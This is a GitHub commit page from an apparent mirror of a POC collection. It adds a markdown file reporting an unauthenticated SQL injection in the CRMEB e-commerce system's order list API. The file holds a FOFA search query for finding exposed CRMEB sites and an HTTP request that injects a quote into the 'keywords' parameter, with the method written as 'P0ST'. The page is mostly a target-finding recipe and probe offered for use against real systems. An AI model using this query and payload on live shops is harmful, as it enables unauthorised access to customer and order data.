admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-21 10:21:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create CRMEB开源电商系统orderlist存在SQL注入漏洞.md

Browse Source
This commit is contained in:
Rainyseason 2025-04-21 10:27:50 +08:00 committed by GitHub
parent ed48c1ec92
commit d15e36e68f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
wpoc/CRMEB/CRMEB开源电商系统orderlist存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,17 @@
## CRMEB开源电商系统orderlist存在SQL注入漏洞
CRMEB开源电商系统存在未授权sql注入漏洞
## fofa
```
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
```
## poc
```
P0ST /api/admin/system/store/order/list?keywords=1' HTTP/1.1
Host:
Content-Type:application/x-www-form-urlencoded
```